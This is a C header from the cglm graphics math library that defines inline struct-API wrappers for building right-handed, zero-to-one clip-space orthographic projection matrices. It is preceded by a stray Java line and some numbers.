Optional<OWLObject> getSelection() { return Optional.ofNullable(getSelectedIndividual()); } }
4,036
1,417
<reponame>llsilva66/cglm<gh_stars>1000+ /* * Copyright (c), <NAME>. * * MIT License (MIT), htt../opensource.org/licenses/MIT * Full license can be found in the LICENSE file */ /* Functions: CGLM_INLINE mat4s glms_ortho_rh_zo(float left, float right, float bottom, float top, float nearZ, float farZ) CGLM_INLINE mat4s glms_ortho_aabb_rh_zo(vec3s box[2]); CGLM_INLINE mat4s glms_ortho_aabb_p_rh_zo(vec3s box[2], float padding); CGLM_INLINE mat4s glms_ortho_aabb_pz_rh_zo(vec3s box[2], float padding); CGLM_INLINE mat4s glms_ortho_default_rh_zo(float aspect) CGLM_INLINE mat4s glms_ortho_default_s_rh_zo(float aspect, float size) */ #ifndef cglms_ortho_rh_zo_h #define cglms_ortho_rh_zo_h #include "../../common.h" #include "../../types-struct.h" #include "../../plane.h" #include "../../cam.h" /*! * @brief set up orthographic projection matrix * with a right-hand coordinate system and a * clip-space of [0, 1]. * * @param[in] left viewport.left * @param[in] right viewport.right * @param[in] bottom viewport.bottom * @param[in] top viewport.top * @param[in] nearZ near clipping plane * @param[in] farZ far clipping plane * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_rh_zo(float left, float right, float bottom, float top, float nearZ, float farZ) { mat4s dest; glm_ortho_rh_zo(left, right, bottom, top, nearZ, farZ, dest.raw); return dest; } /*! * @brief set up orthographic projection matrix using bounding box * with a right-hand coordinate system and a * clip-space of [0, 1]. * * bounding box (AABB) must be in view space * * @param[in] box AABB * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_aabb_rh_zo(vec3s box[2]) { mat4s dest; vec3 rawBox[2]; glms_vec3_unpack(rawBox, box, 2); glm_ortho_aabb_rh_zo(rawBox, dest.raw); return dest; } /*! * @brief set up orthographic projection matrix using bounding box * with a right-hand coordinate system and a * clip-space of [0, 1]. * * bounding box (AABB) must be in view space * * @param[in] box AABB * @param[in] padding padding * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_aabb_p_rh_zo(vec3s box[2], float padding) { mat4s dest; vec3 rawBox[2]; glms_vec3_unpack(rawBox, box, 2); glm_ortho_aabb_p_rh_zo(rawBox, padding, dest.raw); return dest; } /*! * @brief set up orthographic projection matrix using bounding box * with a right-hand coordinate system and a * clip-space of [0, 1]. * * bounding box (AABB) must be in view space * * @param[in] box AABB * @param[in] padding padding for near and far * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_aabb_pz_rh_zo(vec3s box[2], float padding) { mat4s dest; vec3 rawBox[2]; glms_vec3_unpack(rawBox, box, 2); glm_ortho_aabb_pz_rh_zo(rawBox, padding, dest.raw); return dest; } /*! * @brief set up unit orthographic projection matrix * with a right-hand coordinate system and a * clip-space of [0, 1]. * * @param[in] aspect aspect ration ( width / height ) * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_default_rh_zo(float aspect) { mat4s dest; glm_ortho_default_rh_zo(aspect, dest.raw); return dest; } /*! * @brief set up orthographic projection matrix with given CUBE size * with a right-hand coordinate system and a * clip-space of [0, 1]. * * @param[in] aspect aspect ratio ( width / height ) * @param[in] size cube size * @returns result matrix */ CGLM_INLINE mat4s glms_ortho_default_s_rh_zo(float aspect, float size) { mat4s dest; glm_ortho_default_s_rh_zo(aspect, size, dest.raw); return dest; } #endif /* cglms_ortho_rh_zo_h */
1,694